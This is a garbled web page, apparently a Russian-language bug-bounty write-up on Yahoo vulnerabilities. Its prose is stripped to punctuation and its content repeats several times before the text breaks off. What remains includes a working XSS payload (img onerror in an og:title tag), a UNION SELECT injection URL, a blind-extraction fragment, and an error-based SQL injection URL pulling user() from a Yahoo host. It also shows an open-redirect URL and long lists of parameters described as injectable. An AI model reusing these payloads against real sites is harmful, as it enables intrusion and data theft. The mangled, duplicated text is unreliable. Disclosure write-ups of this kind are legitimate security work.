http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
